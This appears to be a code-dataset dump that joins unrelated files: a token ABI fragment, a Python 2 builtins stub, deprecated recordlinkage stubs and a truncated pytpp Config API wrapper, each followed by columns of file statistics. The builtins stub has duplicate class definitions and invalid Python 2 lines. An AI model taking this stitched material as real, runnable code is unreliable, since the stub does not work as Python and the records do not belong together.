ty":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"unwrap","outputs":[],"stateMutability":"nonpayable","type":"function"}]
| 3,557
| 7,113
| 0.669806
| 681
| 7,114
| 6.997063
| 0.093979
| 0.115425
| 0.144806
| 0.10703
| 0.928646
| 0.912277
| 0.854355
| 0.81532
| 0.668416
| 0.576076
| 0
| 0.026719
| 0.000422
| 7,114
| 1
| 7,114
| 7,114
| 0.643369
| 0
| 0
| 0
| 0
| 0
| 0.648861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
269dd25e35da343ee87d9f4a90e6c5c71a29052f
| 20,533
|
py
|
Python
|
tools/scitools/conf/understand/python/python2/__builtin__.py
|
brucegua/moocos
|
575c161cfa35e220f10d042e2e5ca18773691695
|
[
"Apache-2.0"
] | 1
|
2020-01-20T21:26:46.000Z
|
2020-01-20T21:26:46.000Z
|
tools/scitools/conf/understand/python/python2/__builtin__.py
|
brucegua/moocos
|
575c161cfa35e220f10d042e2e5ca18773691695
|
[
"Apache-2.0"
] | null | null | null |
tools/scitools/conf/understand/python/python2/__builtin__.py
|
brucegua/moocos
|
575c161cfa35e220f10d042e2e5ca18773691695
|
[
"Apache-2.0"
] | null | null | null |
class basestring(object):
    # Skeleton declaration of the Python 2 abstract string base class;
    # members are placeholders (assigned 0), not real implementations.
    __new__ = 0
class bool(int):
    # Skeleton declaration of the built-in bool type; every method body is
    # intentionally empty (`pass`) and __new__ is a placeholder.
    def __and__(): pass
    def __or__(): pass
    def __rand__(): pass
    def __repr__(): pass
    def __ror__(): pass
    def __rxor__(): pass
    def __str__(): pass
    def __xor__(): pass
    __new__ = 0
class buffer(object):
    # Skeleton declaration of the Python 2 built-in buffer type; every
    # method body is intentionally empty (`pass`).
    def __add__(): pass
    def __cmp__(): pass
    def __delitem__(): pass
    def __delslice__(): pass
    def __getattribute__(): pass
    def __getitem__(): pass
    def __getslice__(): pass
    def __hash__(): pass
    def __len__(): pass
    def __mul__(): pass
    def __repr__(): pass
    def __rmul__(): pass
    def __setitem__(): pass
    def __setslice__(): pass
    def __str__(): pass
    __new__ = 0
class bytearray(object):
    # Skeleton declaration of the built-in bytearray type; every method body
    # is intentionally empty (`pass`) and class attributes are placeholders.
    def __add__(): pass
    def __alloc__(): pass
    def __contains__(): pass
    def __delitem__(): pass
    def __eq__(): pass
    def __ge__(): pass
    def __getattribute__(): pass
    def __getitem__(): pass
    def __gt__(): pass
    def __iadd__(): pass
    def __imul__(): pass
    def __init__(): pass
    def __iter__(): pass
    def __le__(): pass
    def __len__(): pass
    def __lt__(): pass
    def __mul__(): pass
    def __ne__(): pass
    def __reduce__(): pass
    def __repr__(): pass
    def __rmul__(): pass
    def __setitem__(): pass
    def __sizeof__(): pass
    def __str__(): pass
    def append(): pass
    def capitalize(): pass
    def center(): pass
    def count(): pass
    def decode(): pass
    def endswith(): pass
    def expandtabs(): pass
    def extend(): pass
    def find(): pass
    def index(): pass
    def insert(): pass
    def isalnum(): pass
    def isalpha(): pass
    def isdigit(): pass
    def islower(): pass
    def isspace(): pass
    def istitle(): pass
    def isupper(): pass
    def join(): pass
    def ljust(): pass
    def lower(): pass
    def lstrip(): pass
    def partition(): pass
    def pop(): pass
    def remove(): pass
    def replace(): pass
    def reverse(): pass
    def rfind(): pass
    def rindex(): pass
    def rjust(): pass
    def rpartition(): pass
    def rsplit(): pass
    def rstrip(): pass
    def split(): pass
    def splitlines(): pass
    def startswith(): pass
    def strip(): pass
    def swapcase(): pass
    def title(): pass
    def translate(): pass
    def upper(): pass
    def zfill(): pass
    __new__ = 0
    fromhex = 0
class str(basestring):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def __str__(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def encode(): pass
def endswith(): pass
def expandtabs(): pass
def find(): pass
def format(): pass
def index(): pass
def isalnum(): pass
def isalpha(): pass
def isdigit(): pass
def islower(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def replace(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
bytes = str
class classmethod(object):
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
__func__ = 0
__new__ = 0
class complex(object):
def __abs__(): pass
def __add__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __eq__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __gt__(): pass
def __hash__(): pass
def __int__(): pass
def __le__(): pass
def __long__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __rpow__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def conjugate(): pass
imag = 0
real = 0
__new__ = 0
class dict(object):
def __cmp__(): pass
def __contains__(): pass
def __delitem__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __gt__(): pass
def __init__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __repr__(): pass
def __setitem__(): pass
def __sizeof__(): pass
def clear(): pass
def copy(): pass
def get(): pass
def has_key(): pass
def items(): pass
def iteritems(): pass
def iterkeys(): pass
def itervalues(): pass
def keys(): pass
def pop(): pass
def popitem(): pass
def setdefault(): pass
def update(): pass
def values(): pass
def viewitems(): pass
def viewkeys(): pass
def viewvalues(): pass
__hash__ = None
__new__ = 0
fromkeys = 0
class enumerate(object):
def __getattribute__(): pass
def __iter__(): pass
def next(): pass
__new__ = 0
class file(object):
def __delattr__(): pass
def __enter__(): pass
def __exit__(): pass
def __getattribute__(): pass
def __init__(): pass
def __iter__(): pass
def __repr__(): pass
def __setattr__(): pass
def close(): pass
def fileno(): pass
def flush(): pass
def isatty(): pass
def next(): pass
def read(): pass
def readinto(): pass
def readline(): pass
def readlines(): pass
def seek(): pass
def tell(): pass
def truncate(): pass
def write(): pass
def writelines(): pass
def xreadlines(): pass
closed = 0
errors = 0
mode = 0
name = 0
newlines = 0
softspace = 0
__new__ = 0
class float(object):
def __abs__(): pass
def __add__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __eq__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __gt__(): pass
def __hash__(): pass
def __int__(): pass
def __le__(): pass
def __long__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __rpow__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def __trunc__(): pass
def as_integer_ratio(): pass
def conjugate(): pass
def hex(): pass
def is_integer(): pass
imag = 0
real = 0
__getformat__ = 0
__new__ = 0
__setformat__ = 0
fromhex = 0
class frozenset(object):
def __and__(): pass
def __cmp__(): pass
def __contains__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __gt__(): pass
def __hash__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __or__(): pass
def __rand__(): pass
def __reduce__(): pass
def __repr__(): pass
def __ror__(): pass
def __rsub__(): pass
def __rxor__(): pass
def __sizeof__(): pass
def __sub__(): pass
def __xor__(): pass
def copy(): pass
def difference(): pass
def intersection(): pass
def isdisjoint(): pass
def issubset(): pass
def issuperset(): pass
def symmetric_difference(): pass
def union(): pass
__new__ = 0
class int(object):
def __abs__(): pass
def __add__(): pass
def __and__(): pass
def __cmp__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __hash__(): pass
def __hex__(): pass
def __index__(): pass
def __int__(): pass
def __invert__(): pass
def __long__(): pass
def __lshift__(): pass
def __mod__(): pass
def __mul__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __oct__(): pass
def __or__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rand__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rlshift__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __ror__(): pass
def __rpow__(): pass
def __rrshift__(): pass
def __rshift__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __rxor__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def __trunc__(): pass
def __xor__(): pass
def bit_length(): pass
def conjugate(): pass
denominator = 0
imag = 0
numerator = 0
real = 0
__new__ = 0
class list(object):
def __add__(): pass
def __contains__(): pass
def __delitem__(): pass
def __delslice__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getslice__(): pass
def __gt__(): pass
def __iadd__(): pass
def __imul__(): pass
def __init__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __reversed__(): pass
def __rmul__(): pass
def __setitem__(): pass
def __setslice__(): pass
def __sizeof__(): pass
def append(): pass
def count(): pass
def extend(): pass
def index(): pass
def insert(): pass
def pop(): pass
def remove(): pass
def reverse(): pass
def sort(): pass
__hash__ = None
__new__ = 0
class long(object):
def __abs__(): pass
def __add__(): pass
def __and__(): pass
def __cmp__(): pass
def __coerce__(): pass
def __div__(): pass
def __divmod__(): pass
def __float__(): pass
def __floordiv__(): pass
def __format__(): pass
def __getattribute__(): pass
def __getnewargs__(): pass
def __hash__(): pass
def __hex__(): pass
def __index__(): pass
def __int__(): pass
def __invert__(): pass
def __long__(): pass
def __lshift__(): pass
def __mod__(): pass
def __mul__(): pass
def __neg__(): pass
def __nonzero__(): pass
def __oct__(): pass
def __or__(): pass
def __pos__(): pass
def __pow__(): pass
def __radd__(): pass
def __rand__(): pass
def __rdiv__(): pass
def __rdivmod__(): pass
def __repr__(): pass
def __rfloordiv__(): pass
def __rlshift__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __ror__(): pass
def __rpow__(): pass
def __rrshift__(): pass
def __rshift__(): pass
def __rsub__(): pass
def __rtruediv__(): pass
def __rxor__(): pass
def __sizeof__(): pass
def __str__(): pass
def __sub__(): pass
def __truediv__(): pass
def __trunc__(): pass
def __xor__(): pass
def bit_length(): pass
def conjugate(): pass
denominator = 0
imag = 0
numerator = 0
real = 0
__new__ = 0
class memoryview(object):
def __delitem__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __gt__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __repr__(): pass
def __setitem__(): pass
def tobytes(): pass
def tolist(): pass
format = 0
itemsize = 0
ndim = 0
readonly = 0
shape = 0
strides = 0
suboffsets = 0
__new__ = 0
class object: pass
class property(object):
def __delete__(): pass
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
def __set__(): pass
def deleter(): pass
def getter(): pass
def setter(): pass
fdel = 0
fget = 0
fset = 0
__new__ = 0
class reversed(object):
def __getattribute__(): pass
def __iter__(): pass
def __length_hint__(): pass
def next(): pass
__new__ = 0
class set(object):
def __and__(): pass
def __cmp__(): pass
def __contains__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __gt__(): pass
def __iand__(): pass
def __init__(): pass
def __ior__(): pass
def __isub__(): pass
def __iter__(): pass
def __ixor__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __ne__(): pass
def __or__(): pass
def __rand__(): pass
def __reduce__(): pass
def __repr__(): pass
def __ror__(): pass
def __rsub__(): pass
def __rxor__(): pass
def __sizeof__(): pass
def __sub__(): pass
def __xor__(): pass
def add(): pass
def clear(): pass
def copy(): pass
def difference(): pass
def difference_update(): pass
def discard(): pass
def intersection(): pass
def intersection_update(): pass
def isdisjoint(): pass
def issubset(): pass
def issuperset(): pass
def pop(): pass
def remove(): pass
def symmetric_difference(): pass
def symmetric_difference_update(): pass
def union(): pass
def update(): pass
__hash__ = None
__new__ = 0
class slice(object):
def __cmp__(): pass
def __getattribute__(): pass
def __hash__(): pass
def __reduce__(): pass
def __repr__(): pass
def indices(): pass
start = 0
step = 0
stop = 0
__new__ = 0
class staticmethod(object):
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
__func__ = 0
__new__ = 0
class str(basestring):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def __str__(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def encode(): pass
def endswith(): pass
def expandtabs(): pass
def find(): pass
def format(): pass
def index(): pass
def isalnum(): pass
def isalpha(): pass
def isdigit(): pass
def islower(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def replace(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
class super(object):
def __get__(): pass
def __getattribute__(): pass
def __init__(): pass
def __repr__(): pass
__self__ = 0
__self_class__ = 0
__thisclass__ = 0
__new__ = 0
class tuple(object):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __iter__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def count(): pass
def index(): pass
__new__ = 0
type = 0
class unicode(basestring):
def __add__(): pass
def __contains__(): pass
def __eq__(): pass
def __format__(): pass
def __ge__(): pass
def __getattribute__(): pass
def __getitem__(): pass
def __getnewargs__(): pass
def __getslice__(): pass
def __gt__(): pass
def __hash__(): pass
def __le__(): pass
def __len__(): pass
def __lt__(): pass
def __mod__(): pass
def __mul__(): pass
def __ne__(): pass
def __repr__(): pass
def __rmod__(): pass
def __rmul__(): pass
def __sizeof__(): pass
def __str__(): pass
def capitalize(): pass
def center(): pass
def count(): pass
def decode(): pass
def encode(): pass
def endswith(): pass
def expandtabs(): pass
def find(): pass
def format(): pass
def index(): pass
def isalnum(): pass
def isalpha(): pass
def isdecimal(): pass
def isdigit(): pass
def islower(): pass
def isnumeric(): pass
def isspace(): pass
def istitle(): pass
def isupper(): pass
def join(): pass
def ljust(): pass
def lower(): pass
def lstrip(): pass
def partition(): pass
def replace(): pass
def rfind(): pass
def rindex(): pass
def rjust(): pass
def rpartition(): pass
def rsplit(): pass
def rstrip(): pass
def split(): pass
def splitlines(): pass
def startswith(): pass
def strip(): pass
def swapcase(): pass
def title(): pass
def translate(): pass
def upper(): pass
def zfill(): pass
__new__ = 0
class xrange(object):
def __getattribute__(): pass
def __getitem__(): pass
def __iter__(): pass
def __len__(): pass
def __reduce__(): pass
def __repr__(): pass
def __reversed__(): pass
__new__ = 0
def __import__(): pass
def abs(): pass
def all(): pass
def any(): pass
def apply(): pass
def bin(): pass
def callable(): pass
def chr(): pass
def cmp(): pass
def coerce(): pass
def compile(): pass
def delattr(): pass
def dir(): pass
def divmod(): pass
def eval(): pass
def execfile(): pass
def filter(): pass
def format(): pass
def getattr(): pass
def globals(): pass
def hasattr(): pass
def hash(): pass
def hex(): pass
def id(): pass
def input(): pass
def intern(): pass
def isinstance(): pass
def issubclass(): pass
def iter(): pass
def len(): pass
def locals(): pass
def map(): pass
def max(): pass
def min(): pass
def next(): pass
def oct(): pass
def open(): pass
def ord(): pass
def pow(): pass
def print(): pass
def range(): pass
def raw_input(): pass
def reduce(): pass
def reload(): pass
def repr(): pass
def round(): pass
def setattr(): pass
def sorted(): pass
def sum(): pass
def unichr(): pass
def vars(): pass
def zip(): pass
Ellipsis = 0
False = 0
None = 0
NotImplemented = 0
True = 0
__debug__ = True
copyright = 0
credits = 0
exit = 0
help = 0
license = 0
quit = 0
| 22.865256
| 43
| 0.59587
| 2,499
| 20,533
| 4.108844
| 0.112845
| 0.490164
| 0.04441
| 0.051422
| 0.830444
| 0.773666
| 0.76305
| 0.753701
| 0.674036
| 0.674036
| 0
| 0.005399
| 0.287342
| 20,533
| 897
| 44
| 22.890747
| 0.696303
| 0
| 0
| 0.803738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.871495
| 0.001168
| null | null | 0.001168
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
26c40db15bfa86e70170c35a59ec737a6ac55de2
| 280
|
py
|
Python
|
recordlinkage/deprecated.py
|
LuciaBaldassini/recordlinkage
|
8892d917caf82131ddce3ad2559570b2a0caca02
|
[
"BSD-3-Clause"
] | 641
|
2016-05-03T14:44:55.000Z
|
2022-03-29T19:59:42.000Z
|
recordlinkage/deprecated.py
|
LuciaBaldassini/recordlinkage
|
8892d917caf82131ddce3ad2559570b2a0caca02
|
[
"BSD-3-Clause"
] | 143
|
2015-11-23T10:58:41.000Z
|
2022-03-24T00:18:00.000Z
|
recordlinkage/deprecated.py
|
LuciaBaldassini/recordlinkage
|
8892d917caf82131ddce3ad2559570b2a0caca02
|
[
"BSD-3-Clause"
] | 126
|
2016-09-29T20:04:25.000Z
|
2022-03-25T12:52:25.000Z
|
class PairsCore(object):
    """Stub for the pre-0.12.0 ``PairsCore`` API; instantiation always fails."""

    def __init__(self, *args, **kwargs):
        # The indexing API was rewritten in 0.12.0; fail loudly on any use.
        message = "this class was removed in version 0.12.0"
        raise AttributeError(message)
class Pairs(object):
    """Stub for the pre-0.12.0 ``Pairs`` API; instantiation always fails."""

    def __init__(self, *args, **kwargs):
        # Mirrors PairsCore: the class only exists to signal its own removal.
        message = "this class was removed in version 0.12.0"
        raise AttributeError(message)
| 21.538462
| 72
| 0.671429
| 38
| 280
| 4.736842
| 0.473684
| 0.1
| 0.144444
| 0.188889
| 0.866667
| 0.866667
| 0.866667
| 0.866667
| 0.866667
| 0.866667
| 0
| 0.036036
| 0.207143
| 280
| 12
| 73
| 23.333333
| 0.774775
| 0
| 0
| 0.666667
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
f83dea0dbf0df9502e0a680559c92055222c5548
| 37,188
|
py
|
Python
|
pytpp/api/websdk/endpoints/config.py
|
Venafi/pytpp
|
42af655b2403b8c9447c86962abd4aaa0201f646
|
[
"MIT"
] | 4
|
2022-02-04T23:58:55.000Z
|
2022-02-15T18:53:08.000Z
|
pytpp/api/websdk/endpoints/config.py
|
Venafi/pytpp
|
42af655b2403b8c9447c86962abd4aaa0201f646
|
[
"MIT"
] | null | null | null |
pytpp/api/websdk/endpoints/config.py
|
Venafi/pytpp
|
42af655b2403b8c9447c86962abd4aaa0201f646
|
[
"MIT"
] | null | null | null |
from typing import List
from pytpp.api.api_base import API, APIResponse, api_response_property
from pytpp.properties.response_objects.config import Config
class _Config:
def __init__(self, api_obj):
    """Expose every /Config WebSDK endpoint as an attribute bound to *api_obj*.

    Args:
        api_obj: Authenticated WebSDK API session that each endpoint posts through.
    """
    self.AddDnValue = self._AddDnValue(api_obj=api_obj)
    self.AddPolicyValue = self._AddPolicyValue(api_obj=api_obj)
    self.AddValue = self._AddValue(api_obj=api_obj)
    self.ClearAttribute = self._ClearAttribute(api_obj=api_obj)
    self.ClearPolicyAttribute = self._ClearPolicyAttribute(api_obj=api_obj)
    self.ContainableClasses = self._ContainableClasses(api_obj=api_obj)
    # Bug fix: _CountObjects and _FindContainers are fully implemented below
    # but were never bound here, so Config.CountObjects / Config.FindContainers
    # raised AttributeError. NOTE(review): confirm the omission wasn't deliberate.
    self.CountObjects = self._CountObjects(api_obj=api_obj)
    self.Create = self._Create(api_obj=api_obj)
    self.DefaultDN = self._DefaultDN(api_obj=api_obj)
    self.Delete = self._Delete(api_obj=api_obj)
    self.DnToGuid = self._DnToGuid(api_obj=api_obj)
    self.Enumerate = self._Enumerate(api_obj=api_obj)
    self.EnumerateAll = self._EnumerateAll(api_obj=api_obj)
    self.EnumerateObjectsDerivedFrom = self._EnumerateObjectsDerivedFrom(api_obj=api_obj)
    self.EnumeratePolicies = self._EnumeratePolicies(api_obj=api_obj)
    self.Find = self._Find(api_obj=api_obj)
    self.FindContainers = self._FindContainers(api_obj=api_obj)
    self.FindObjectsOfClass = self._FindObjectsOfClass(api_obj=api_obj)
    self.FindPolicy = self._FindPolicy(api_obj=api_obj)
    self.GetHighestRevision = self._GetHighestRevision(api_obj=api_obj)
    self.GetRevision = self._GetRevision(api_obj=api_obj)
    self.GuidToDn = self._GuidToDn(api_obj=api_obj)
    self.IdInfo = self._IdInfo(api_obj=api_obj)
    self.IsValid = self._IsValid(api_obj=api_obj)
    self.MutateObject = self._MutateObject(api_obj=api_obj)
    self.Read = self._Read(api_obj=api_obj)
    self.ReadAll = self._ReadAll(api_obj=api_obj)
    self.ReadDn = self._ReadDn(api_obj=api_obj)
    self.ReadDnReferences = self._ReadDnReferences(api_obj=api_obj)
    self.ReadEffectivePolicy = self._ReadEffectivePolicy(api_obj=api_obj)
    self.ReadPolicy = self._ReadPolicy(api_obj=api_obj)
    self.RemoveDnValue = self._RemoveDnValue(api_obj=api_obj)
    self.RemovePolicyValue = self._RemovePolicyValue(api_obj=api_obj)
    self.RenameObject = self._RenameObject(api_obj=api_obj)
    self.Write = self._Write(api_obj=api_obj)
    self.WriteDn = self._WriteDn(api_obj=api_obj)
    self.WritePolicy = self._WritePolicy(api_obj=api_obj)
class _AddDnValue(API):
    """Endpoint wrapper for ``POST /Config/AddDnValue``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/AddDnValue')

    def post(self, object_dn: str, attribute_name: str, value: str):
        # Per-call response model: only 'Result' is read back.
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'AttributeName': attribute_name,
            'Value': value,
        }
        return _Response(response=self._post(data=payload))
class _AddPolicyValue(API):
    """Endpoint wrapper for ``POST /Config/AddPolicyValue``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/AddPolicyValue')

    def post(self, object_dn: str, attribute_name: str, class_name: str, value: str, locked: bool):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'AttributeName': attribute_name,
            'Class': class_name,
            'Value': value,
            'Locked': locked,
        }
        return _Response(response=self._post(data=payload))
class _AddValue(API):
    """Endpoint wrapper for ``POST /Config/AddValue``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/AddValue')

    def post(self, object_dn: str, attribute_name: str, value: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'AttributeName': attribute_name,
            'Value': value,
        }
        return _Response(response=self._post(data=payload))
class _ClearAttribute(API):
    """Endpoint wrapper for ``POST /Config/ClearAttribute``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ClearAttribute')

    def post(self, object_dn: str, attribute_name: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'AttributeName': attribute_name,
        }
        return _Response(response=self._post(data=payload))
class _ClearPolicyAttribute(API):
    """Endpoint wrapper for ``POST /Config/ClearPolicyAttribute``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ClearPolicyAttribute')

    def post(self, object_dn: str, class_name: str, attribute_name: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Class': class_name,
            'AttributeName': attribute_name,
        }
        return _Response(response=self._post(data=payload))
class _ContainableClasses(API):
    """Endpoint wrapper for ``POST /Config/ContainableClasses``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/ContainableClasses')

    def post(self, object_dn: str):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def class_names(self) -> List[str]:
                return self._from_json(key='ClassNames')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {'ObjectDN': object_dn}
        return _Response(response=self._post(data=payload))
class _CountObjects(API):
    """Endpoint wrapper for ``POST /Config/CountObjects``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/CountObjects')

    def post(self, object_dn: str, type_name: str, recursive: bool = False, pattern: str = None):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def count(self) -> int:
                return self._from_json(key='Count')

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Type': type_name,
            'Pattern': pattern,
            'Recursive': recursive,
        }
        return _Response(response=self._post(data=payload))
class _Create(API):
    """Endpoint wrapper for ``POST /Config/Create``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/Create')

    def post(self, object_dn: str, class_name: str, name_attribute_list: list):
        class _Response(APIResponse):
            def __init__(self, response):
                super().__init__(response=response)

            @property
            @api_response_property()
            def object(self):
                return Config.Object(self._from_json(key='Object'))

            @property
            @api_response_property()
            def result(self):
                return Config.Result(self._from_json(key='Result'))

        payload = {
            'ObjectDN': object_dn,
            'Class': class_name,
            'NameAttributeList': name_attribute_list,
        }
        return _Response(response=self._post(data=payload))
class _DefaultDN(API):
    """Endpoint wrapper for ``POST /Config/DefaultDN``."""

    def __init__(self, api_obj):
        super().__init__(api_obj=api_obj, url='/Config/DefaultDN')

    def post(self, default_dn: str):
        class _Response(APIResponse):
            def __init__(self, response):
